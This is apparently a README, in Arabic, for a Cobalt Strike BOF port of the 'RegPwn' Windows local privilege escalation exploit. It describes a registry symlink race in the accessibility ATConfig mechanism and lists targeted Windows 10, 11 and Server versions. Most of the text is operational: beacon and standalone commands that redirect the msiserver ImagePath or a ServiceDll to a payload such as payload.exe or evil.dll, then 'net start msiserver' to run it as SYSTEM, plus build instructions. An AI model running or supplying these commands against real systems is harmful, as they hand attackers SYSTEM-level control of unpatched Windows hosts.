
Bof of RegPwn by MDSec
منفذ BOF من Cobalt Strike لاستغلال RegPwn بواسطة فيليب دراغوفيتش (@Wh04m1001) / MDSec ActiveBreach.
هذا إعادة تنفيذ غير محكمة (sloppy) للاستغلال الأصلي المكتوب بلغة C#. كل الفضل في البحث عن الثغرة والاستغلال يعود لفيليب دراغوفيتش و MDSec.
يستغل حالة سباق (race condition) في رابط رمزي (symlink) في السجل (registry) ضمن آلية ATConfig الخاصة بإمكانية الوصول في Windows لكتابة قيم تعسفية إلى مفاتيح سجل محمية (HKLM) من سياق مستخدم عادي (تصعيد الامتيازات المحلية).
يستهدف Windows 11 25H2/24H2، وWindows 10 21H2، وWindows Server 2016/2019/2022 قبل تصحيح مارس 2026.
تحذير: هذا الاستغلال يقوم بقفل محطة العمل كجزء من حالة السباق.
خدمة msiserver (مثبت Windows) ImagePath. تعمل هذه الخدمة كـ SYSTEM ويمكن للمستخدمين العاديين تشغيلها.
قم بتحميل regpwn.cna في مدير السكربتات، ثم:
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath
بعد نجاح الاستغلال، ابدأ الخدمة لتنفيذ الحمولة كـ SYSTEM:
net start msiserver
يتطلب x86_64-w64-mingw32-gcc (مترجم MinGW-w64 عبر المنصات).
make # بناء BOF (regpwn.x64.o)
make test # بناء EXE مستقل (regpwn.x64.exe)
make clean
x64 فقط.